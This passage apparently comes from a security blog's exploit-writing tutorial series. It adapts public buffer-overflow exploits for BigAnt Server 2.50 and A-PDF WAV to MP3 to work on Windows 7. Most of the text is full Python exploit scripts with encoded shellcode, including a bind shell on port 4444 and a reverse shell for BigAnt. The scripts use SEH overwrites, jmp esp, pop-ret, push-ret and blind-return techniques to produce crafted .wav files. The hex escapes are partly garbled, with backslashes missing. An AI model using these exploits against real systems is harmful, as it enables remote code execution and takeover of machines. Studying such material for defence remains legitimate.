"x36x4bx4fx42x55x47x34x4bx4fx49x46x51x4bx50x57"
"x51x42x50x51x46x31x50x51x43x5ax43x31x50x51x50"
"x51x51x45x50x51x4bx4fx48x50x42x48x4ex4dx48x59"
"x45x55x48x4ex50x53x4bx4fx49x46x42x4ax4bx4fx4b"
"x4fx47x47x4bx4fx4ex30x4cx4bx51x47x4bx4cx4bx33"
"x48x44x45x34x4bx4fx49x46x50x52x4bx4fx4ex30x45"
"x38x4ax50x4dx5ax43x34x51x4fx51x43x4bx4fx4ex36"
"x4bx4fx4ex30x41x41")

payload = "x41" * 985        # seh overwritten at 989
next_seh = "xebx06x90x90"   # short jump 6 bytes
seh = "x6ax19x9ax0f"    # p/p/r from vbajet32.dll
nops = "x90" * 10        # nop sled
sc = shellcode            # 710 bytes available for shellcode

print "n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3n"

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   s.connect((host,port))
except:
   print "[x] Error establishing connectionn"
   sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + "rnrn")
s.close()
print "[+] Connect to bind shell on port 4444n"

# milw0rm.com [2009-09-15]

Our goal is to make it work for Windows 7. With simple fixes we can adapt it to our needs and at the same time understand how to exploit a BOF with the SEH technique. Just like in the first tutorial, we calculate the offset:

root@bt:/var/www/bigant# /pentest/exploits/framework3/tools/pattern_create.rb 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8A
[ snip ]

And we put it in the exploit:

#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:WINDOWSsystem32>

import socket, sys

if len(sys.argv)!= 3:
   print "n[*] Usage: %s n" % sys.argv[0]
   sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])     # port 6660 by default

# windows/shell_bind_tcp - 696 bytes  Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = ("")

payload = "Aa0Aa1Aa2A..."
next_seh = "xebx06x90x90"   # short jump 6 bytes
seh = "x6ax19x9ax0f"    # p/p/r from vbajet32.dll
nops = "x90" * 10        # nop sled
sc = shellcode            # 710 bytes available for shellcode

print "n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3n"

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   s.connect((host,port))
except:
   print "[x] Error establishing connectionn"
   sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + "rnrn")
s.close()
print "[+] Connect to bind shell on port 4444n"

# milw0rm.com [2009-09-15]

We attach BigAnt to OllyDbg and launch the exploit.
Obviously the application crashes, but in “view” -> “seh chain” we can see the value about SEH (30684239 in my case). Now we can calculate the exact offset for Windows 7:

/pentest/exploits/framework3/tools/pattern_offset.rb 30684239 5000
989

This means that the SEH will be overwritten after exactly 989 bytes and the NEXT SEH after 985 (989-4).

So the exploit will be like this:
[985 bytes of payload] [NEXT SEH] [SEH] [nops] [shellcode].

NEXT SEH will be overwritten with the address “xebx06x90x90”, an unconditional jump of 6 bytes to point to the nops at the beginning of the shellcode, and the SEH will be overwritten with an address that points to a pop pop ret opcode. This is because when an exception occurs, the dispatcher creates its own frame on the stack. In this frame the NEXT SEH is at ESP +8. So to overwrite it will be necessary a pop pop ret opcode which pushes 8 bytes out from the stack and gets the current value from the stack (top ESP) and puts it in the EIP.
This opcode can be found and exploited in the VBAJET32.dll with “0F9A19CD” address. So the new exploit will be as the following:

#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:WINDOWSsystem32>

import socket, sys

if len(sys.argv)!= 3:
   print "n[*] Usage: %s n" % sys.argv[0]
   sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])     # port 6660 by default

# windows/shell_bind_tcp - 696 bytes  Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode=("x42" * 2000)

payload = "x41" * 985        # seh overwritten at 989
next_seh = "xebx06x90x90"   # short jump 6 bytes
seh = "xcdx19x9ax0f"    # 0F9A19CD p/p/r from vbajet32.dll
nops = "x90" * 10        # nop sled
sc = shellcode            # 710 bytes available for shellcode

print "n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3n"

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   s.connect((host,port))
except:
   print "[x] Error establishing connectionn"
   sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + "rnrn")
s.close()
print "[+] Connect to bind shell on port 4444n"

# milw0rm.com [2009-09-15]

Running OllyDbg and setting a breakpoint in the address of pop pop ret “0F9A19CD” we realize that the application reaches this address (if not it means that we have done something wrong), and after the jump reaches the shellcode.
At this point you can replace the shellcode with something more interesting such as a reverse shell tcp:

#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blaked
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:WINDOWSsystem32>

import socket, sys

if len(sys.argv)!= 3:
   print "n[*] Usage: %s n" % sys.argv[0]
   sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])     # port 6660 by default

# windows/shell_bind_tcp - 696 bytes  Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode=("xdaxc9xd9x74x24xf4x5dx55x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x49"
"x6cx49x78x4fx79x47x70x43x30x45x50x45x30x4cx49"
"x4dx35x46x51x48x52x45x34x4cx4bx42x72x44x70x4e"
"x6bx50x52x46x6cx4ex6bx50x52x46x74x4ex6bx51x62"
"x46x48x44x4fx4fx47x42x6ax45x76x45x61x49x6fx44"
"x71x4bx70x4cx6cx45x6cx45x31x43x4cx46x62x44x6c"
"x51x30x4bx71x48x4fx44x4dx43x31x4fx37x4ax42x48"
"x70x51x42x43x67x4ex6bx50x52x44x50x4cx4bx50x42"
"x47x4cx46x61x48x50x4ex6bx43x70x42x58x4bx35x49"
"x50x44x34x43x7ax46x61x4ex30x42x70x4cx4bx51x58"
"x42x38x4cx4bx43x68x51x30x43x31x4bx63x48x63x45"
"x6cx50x49x4ex6bx46x54x4cx4bx45x51x49x46x44x71"
"x49x6fx46x51x4fx30x4cx6cx4bx71x48x4fx46x6dx43"
"x31x48x47x47x48x49x70x42x55x49x64x44x43x43x4d"
"x4cx38x45x6bx51x6dx51x34x51x65x49x72x43x68x4c"
"x4bx51x48x44x64x43x31x4bx63x42x46x4cx4bx44x4c"
"x50x4bx4ex6bx50x58x45x4cx45x51x4ax73x4cx4bx45"
"x54x4ex6bx47x71x4ax70x4dx59x43x74x47x54x46x44"
"x51x4bx43x6bx43x51x46x39x50x5ax50x51x49x6fx4b"
"x50x42x78x43x6fx43x6ax4cx4bx42x32x48x6bx4ex66"
"x51x4dx50x68x44x73x46x52x47x70x45x50x45x38x50"
"x77x51x63x46x52x43x6fx46x34x42x48x42x6cx51x67"
"x51x36x46x67x49x6fx48x55x48x38x4ax30x45x51x45"
"x50x47x70x51x39x4bx74x42x74x46x30x42x48x47x59"
"x4fx70x42x4bx43x30x4bx4fx4ax75x50x50x46x30x50"
"x50x50x50x47x30x50x50x47x30x42x70x42x48x4bx5a"
"x46x6fx4bx6fx4bx50x49x6fx4ax75x4dx47x43x5ax43"
"x35x45x38x4fx30x4ex48x43x31x45x56x42x48x45x52"
"x43x30x47x61x43x6cx4fx79x4bx56x42x4ax42x30x50"
"x56x46x37x50x68x4fx69x4ex45x43x44x43x51x49x6f"
"x4ex35x4fx75x4fx30x50x74x46x6cx4bx4fx50x4ex44"
"x48x50x75x48x6cx51x78x48x70x4fx45x4dx72x43x66"
"x49x6fx4ex35x51x7ax43x30x51x7ax44x44x50x56x51"
"x47x42x48x43x32x4ex39x49x58x43x6fx4bx4fx48x55"
"x4ex6bx44x76x50x6ax43x70x51x78x45x50x46x70x43"
"x30x43x30x50x56x43x5ax45x50x43x58x46x38x4cx64"
"x51x43x4ax45x4bx4fx4ax75x4fx63x50x53x51x7ax43"
"x30x51x46x43x63x46x37x51x78x46x62x4ax79x4ax68"
"x43x6fx49x6fx48x55x46x61x4bx73x51x39x48x46x4b"
"x35x4ax56x44x35x48x6cx4fx33x46x6ax41x41");

payload = "x41" * 985        # seh overwritten at 989
next_seh = "xebx06x90x90"   # short jump 6 bytes
seh = "xcdx19x9ax0f"    # 0F9A19CD p/p/r from vbajet32.dll
nops = "x90" * 10        # nop sled
sc = shellcode            # 710 bytes available for shellcode
padding = "x90" * 1300

print "n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3n"

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   s.connect((host,port))
except:
   print "[x] Error establishing connectionn"
   sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + padding + "rnrn")
s.close()
print "[+] Connect to bind shell on port 4444n"

# milw0rm.com [2009-09-15]

Pwned!

Here there is a video demonstration:

See you
Michele `m7x` Manzotti

References: Thanks to Corelan.

Tutorial write an exploit Part 2 October 29, 2010

Posted by michelemanzotti in manzotti.eu, Security, Tutorial.
Tags: , , , , , , , , ,
1 comment so far

After having fully understood the tutorial part 1 let’s go to read the second one. In this tutorial we will see further techniques to exploit a BOF of the program a-pdf, a tool to convert WAV to MP3.

JUMP or CALL

With these techniques you use a register that contains the address where the shellcode resides and put it in EIP. This technique has been described in the tutorial part 1, with variant that could be used with a call instead of jmp.

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:    A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:    Dr_IDE
# Tested On:    XPSP3
# Date:        August 18, 2010
# Download:     http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:    http://www.exploit-db.com/exploits/14676/
# Usage:    Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = ("x41" * 4128);
# 1002F1C3 call esp in lame_enc.dll
eip = ("xc3xf1x02x10");
nops = ("x90" * 16);
shellcode = ("x33xc9xb8x57xbaxf8x4bxdbxdaxb1x33xd9x74x24xf4"
"x5bx83xebxfcx31x43x0dx03x43x5ax58x0dxb7x8cx15"
"xeex48x4cx46x66xadx7dx54x1cxa5x2fx68x56xebxc3"
"x03x3ax18x50x61x93x2fxd1xccxc5x1exe2xe0xc9xcd"
"x20x62xb6x0fx74x44x87xdfx89x85xc0x02x61xd7x99"
"x49xd3xc8xaex0cxefxe9x60x1bx4fx92x05xdcx3bx28"
"x07x0dx93x27x4fxb5x98x60x70xc4x4dx73x4cx8fxfa"
"x40x26x0ex2ax99xc7x20x12x76xf6x8cx9fx86x3ex2a"
"x7fxfdx34x48x02x06x8fx32xd8x83x12x94xabx34xf7"
"x24x78xa2x7cx2ax35xa0xdbx2fxc8x65x50x4bx41x88"
"xb7xddx11xafx13x85xc2xcex02x63xa5xefx55xcbx1a"
"x4ax1dxfex4fxecx7cx95x8ex7cxfbxd0x90x7ex04x73"
"xf8x4fx8fx1cx7fx50x5ax59x81xa1x57x74x15x18x02"
"x35x78x9bxf8x7ax84x18x09x03x73x00x78x06x38x86"
"x90x7ax51x63x97x29x52xa6xf4xacxc0x2axd5x4bx60"
"xc8x29x9e");
sploit = (buff + eip + nops +  shellcode);

try:
    f1 = open("Drop.wav","w");    #No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

POP RETURN

If any register points directly to the shellcode but you can see the address on the stack (first, second, third address in the stack) that points to the shellcode then you can load that value into EIP by first putting a pointer to pop ret or pop pop ret (depending on where the location is found on the stack ) into EIP.
In the first tutorial we have seen that the shellcode was located exactly into EIP, it was necessary to add more 8 nops so the shellcode began at first byte.
Let’s suppose that the shellcode is located after 8 bytes. To catch it we could use a pop pop ret, by looking for in dll loaded, and then load the jmp esp to point directly to the shellcode. So we have an address that points to a pop pop ret opcode into EIP and soon after the 8 bytes (junk) there is the jmp esp opcode that jumps to the shellcode.

[ BOF ] [pop pop ret] [junk] [ jmp esp ] [nops] [shellcode]

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:    A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:    Dr_IDE
# Tested On:    XPSP3
# Date:        August 18, 2010
# Download:     http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:    http://www.exploit-db.com/exploits/14676/
# Usage:    Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = ("x41" * 4128);
# 00428F3F jmp esp in wavtomp3.exe
# 10034207 pop pop ret in lame_enc.dll
eip = ("x07x42x03x10");
esp = ("x3fx8fx42x00");
junk = ("x42" * 8);
nops = ("x90" * 4);
shellcode = ("x33xc9xb8x57xbaxf8x4bxdbxdaxb1x33xd9x74x24xf4"
"x5bx83xebxfcx31x43x0dx03x43x5ax58x0dxb7x8cx15"
"xeex48x4cx46x66xadx7dx54x1cxa5x2fx68x56xebxc3"
"x03x3ax18x50x61x93x2fxd1xccxc5x1exe2xe0xc9xcd"
"x20x62xb6x0fx74x44x87xdfx89x85xc0x02x61xd7x99"
"x49xd3xc8xaex0cxefxe9x60x1bx4fx92x05xdcx3bx28"
"x07x0dx93x27x4fxb5x98x60x70xc4x4dx73x4cx8fxfa"
"x40x26x0ex2ax99xc7x20x12x76xf6x8cx9fx86x3ex2a"
"x7fxfdx34x48x02x06x8fx32xd8x83x12x94xabx34xf7"
"x24x78xa2x7cx2ax35xa0xdbx2fxc8x65x50x4bx41x88"
"xb7xddx11xafx13x85xc2xcex02x63xa5xefx55xcbx1a"
"x4ax1dxfex4fxecx7cx95x8ex7cxfbxd0x90x7ex04x73"
"xf8x4fx8fx1cx7fx50x5ax59x81xa1x57x74x15x18x02"
"x35x78x9bxf8x7ax84x18x09x03x73x00x78x06x38x86"
"x90x7ax51x63x97x29x52xa6xf4xacxc0x2axd5x4bx60"
"xc8x29x9e");
sploit = (buff + eip + junk + esp + nops +shellcode);

try:
    f1 = open("Drop2.wav","w");    #No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

PUSH RETURN

This techinque is a little bit different from CALL a register approach. If you don’t find out anywhere a jmp or call reg opcode then you could put the address directly into the stack and do a ret. Basically you look for a push reg followed by a ret and then you put the address of this opcode into eip.

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:    A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:    Dr_IDE
# Tested On:    XPSP3
# Date:        August 18, 2010
# Download:     http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:    http://www.exploit-db.com/exploits/14676/
# Usage:    Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = ("x41" * 4128);
# 0047A01D push esp ret in wavtomp3.exe
eip = ("x1dxa0x47x00");
nops = ("x90" * 4);
shellcode = ("x33xc9xb8x57xbaxf8x4bxdbxdaxb1x33xd9x74x24xf4"
"x5bx83xebxfcx31x43x0dx03x43x5ax58x0dxb7x8cx15"
"xeex48x4cx46x66xadx7dx54x1cxa5x2fx68x56xebxc3"
"x03x3ax18x50x61x93x2fxd1xccxc5x1exe2xe0xc9xcd"
"x20x62xb6x0fx74x44x87xdfx89x85xc0x02x61xd7x99"
"x49xd3xc8xaex0cxefxe9x60x1bx4fx92x05xdcx3bx28"
"x07x0dx93x27x4fxb5x98x60x70xc4x4dx73x4cx8fxfa"
"x40x26x0ex2ax99xc7x20x12x76xf6x8cx9fx86x3ex2a"
"x7fxfdx34x48x02x06x8fx32xd8x83x12x94xabx34xf7"
"x24x78xa2x7cx2ax35xa0xdbx2fxc8x65x50x4bx41x88"
"xb7xddx11xafx13x85xc2xcex02x63xa5xefx55xcbx1a"
"x4ax1dxfex4fxecx7cx95x8ex7cxfbxd0x90x7ex04x73"
"xf8x4fx8fx1cx7fx50x5ax59x81xa1x57x74x15x18x02"
"x35x78x9bxf8x7ax84x18x09x03x73x00x78x06x38x86"
"x90x7ax51x63x97x29x52xa6xf4xacxc0x2axd5x4bx60"
"xc8x29x9e");
sploit = (buff + eip + nops +shellcode);

try:
    f1 = open("Drop3.wav","w");    #No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

JUMP [reg + offset]

If there is a register that points to the buffer containing the shellcode, but it does not point at the beginning of the shellcode, you can also try to find an instruction in one of the OS or dll’s application, which will add the required bytes to the register and then jumps to the register. E.g. a jmp dword ptr [esp+8].

BLIND RETURN

A RET instruction pop the last value (4bytes) from the stack and put that address in ESP. So if you overwrite EIP with the address that perform a RET instruction, you load the value stored at ESP into EIP.

We need to:
– Overwrite the eip with the address that points to ret opcode
– Enter the address that points to the shellcode in the first 4 bytes of the ESP
So when the ret is executed, the last added 4 bytes are popped from the stack and put in EIP.

[BOF][ret opcode address][shellcode address][shellcode]

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:    A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:    Dr_IDE
# Tested On:    XPSP3
# Date:        August 18, 2010
# Download:     http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:    http://www.exploit-db.com/exploits/14676/
# Usage:    Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = ("x41" * 4128);
# 76541842 ret in user32.dll
# 00428F3F jmp esp in wavtomp3.exe
eip = ("x42x18x54x76");
esp = ("x3fx8fx42x00");
nops = ("x90" * 4);
shellcode = ("x33xc9xb8x57xbaxf8x4bxdbxdaxb1x33xd9x74x24xf4"
"x5bx83xebxfcx31x43x0dx03x43x5ax58x0dxb7x8cx15"
"xeex48x4cx46x66xadx7dx54x1cxa5x2fx68x56xebxc3"
"x03x3ax18x50x61x93x2fxd1xccxc5x1exe2xe0xc9xcd"
"x20x62xb6x0fx74x44x87xdfx89x85xc0x02x61xd7x99"
"x49xd3xc8xaex0cxefxe9x60x1bx4fx92x05xdcx3bx28"
"x07x0dx93x27x4fxb5x98x60x70xc4x4dx73x4cx8fxfa"
"x40x26x0ex2ax99xc7x20x12x76xf6x8cx9fx86x3ex2a"
"x7fxfdx34x48x02x06x8fx32xd8x83x12x94xabx34xf7"
"x24x78xa2x7cx2ax35xa0xdbx2fxc8x65x50x4bx41x88"
"xb7xddx11xafx13x85xc2xcex02x63xa5xefx55xcbx1a"
"x4ax1dxfex4fxecx7cx95x8ex7cxfbxd0x90x7ex04x73"
"xf8x4fx8fx1cx7fx50x5ax59x81xa1x57x74x15x18x02"
"x35x78x9bxf8x7ax84x18x09x03x73x00x78x06x38x86"
"x90x7ax51x63x97x29x52xa6xf4xacxc0x2axd5x4bx60"
"xc8x29x9e");
sploit = (buff + eip + esp + nops +shellcode);

try:
    f1 = open("Drop4.wav","w");    #No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

SEH

Every application has a default exception handler which is provided by the OS. So even if the application itself does not use exception handling, you can try to overwrite the SEH handler with your own address and make it jump to your shellcode. Using SEH can make an exploit more reliable on various windows platforms, but it requires some more explanations before you can start abusing the SEH to write exploits. That’s why the next tutorial will be entirely dedicated to this technique.

The following video shows these techniques just described:

See you
Michele `m7x` Manzotti

References: Thanks to Corelan.

Would you be white hat if it paid more? October 1, 2010

Posted by michelemanzotti in manzotti.eu, Reti e Telecomunicazioni, Security.
Tags: , , , ,
add a comment

If this is true or not no one knows but it is interesting to have an idea about cyber market.
You can read the full interview about SpyEye, a variant of Zeus Botnet, here:
SpyEye Analysis Part 1
SpyEye Analysis Part 2

Tutorial write an exploit Part 1 JMP to ESP September 10, 2010

Posted by michelemanzotti in manzotti.eu, Security, Tutorial.
Tags: , , , , ,
2 comments

This article begins a small series of tutorials that aims to make you understand in an easier and more detailed way how to build an exploit. The Internet is an inexhaustible source of knowledge and I also want to give my contribution.

In most cases when there is an exploit which takes advantage of a vulnerability, it does not work. This does not mean that there is not the vulnerability but that some small piece of the puzzle was not reassembled correctly. The goal of this first tutorial is to understand in simple steps how these vulnerabilities work, in order to write working exploits according to our needs.

Let’s start with this exploit, which allows a buffer overflow (BOF) of the program a-pdf, a tool to convert WAV to MP3.
The exploit was tested on XP with Service Pack 3. So it doesn’t work on different platform like Win7.

You can download the code below:

#!/usr/bin/env python

#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

code = (
"x89xe1xd9xeexd9x71xf4x58x50x59x49x49x49x49"
"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41"
"x42x41x41x42x54x41x41x51x32x41x42x32x42x42"
"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a"
"x48x47x34x43x30x45x50x45x50x4cx4bx51x55x47"
"x4cx4cx4bx43x4cx45x55x42x58x45x51x4ax4fx4c"
"x4bx50x4fx45x48x4cx4bx51x4fx51x30x43x31x4a"
"x4bx51x59x4cx4bx50x34x4cx4bx43x31x4ax4ex46"
"x51x49x50x4cx59x4ex4cx4dx54x49x50x42x54x45"
"x57x49x51x49x5ax44x4dx43x31x48x42x4ax4bx4c"
"x34x47x4bx50x54x47x54x45x54x43x45x4bx55x4c"
"x4bx51x4fx47x54x45x51x4ax4bx45x36x4cx4bx44"
"x4cx50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4c"
"x4bx45x4cx4cx4bx45x51x4ax4bx4cx49x51x4cx46"
"x44x44x44x48x43x51x4fx50x31x4ax56x45x30x50"
"x56x42x44x4cx4bx51x56x50x30x4cx4bx51x50x44"
"x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx43x58x45"
"x58x4bx39x4ax58x4dx53x49x50x42x4ax50x50x43"
"x58x4ax50x4dx5ax44x44x51x4fx45x38x4ax38x4b"
"x4ex4cx4ax44x4ex50x57x4bx4fx4dx37x42x43x43"
"x51x42x4cx42x43x43x30x41x41");

buff = ("x41" * 4132);
nops = ("x90" * 12);
nseh = ("xEBx06x90x90");
retn = ("x5Cx26x47x00");
junk = ("x42" * 300);
sploit = (buff+ nseh + retn + nops + code + junk);

try:
    f1 = open("Dr_IDEs.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

As you could read, the exploit should launch calc.exe, but unfortunately we can only see an application crash on Win7.

But how can we exploit this vulnerability for Win7?

This “simple” question will allow us to understand how the Windows stack works.
Currently what we have to know is that when the CPU loads a program into memory three components are placed:
– Code segment
– Data segment
– Stack segment

Stack section loads and unloads frames, and to perform this function the CPU uses registers.

The most important ones are:
– ESP pointer on the stack
– EBP: pointer to the base of the stack
– EIP: pointer to next instruction
Now I would not go into details which have already been widely discussed on the Internet, refer to Google to fill some gaps in this article.

Stay tuned to our goal we say that there are many techniques of jumping to exploit a BOF. Watching this exploit is clear that it uses a technique called SEH, nevertheless in this tutorial we’ll see how to use a jmp esp.

Firstly we verify that there is actually BOF and the eip is overwritten:

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work

buff = ("x41" * 5000);
sploit = (buff);

try:
    f1 = open("Dr_IDEs2.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

At this point we run the a-pdf application and link the process to OllyDbg.
By converting the newly created file with the exploit we notice that the application crashs and we verify precisely that the EIP is overwritten with all A ” x41″ in hexadecimal notation:

EAX 00000000
ECX 00001388
EDX 00001388
EBX 41414141
ESP 034DFE90 ASCII "AAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141

So the BOF happens, but in order to be used it is necessary to calculate the offset, the right range where the EIP is overwritten. To help us there are some tools in the framework Metasploit:

root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1
Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3
Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3A [. . .]

We create the pattern and copy the output directly into the exploit:

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

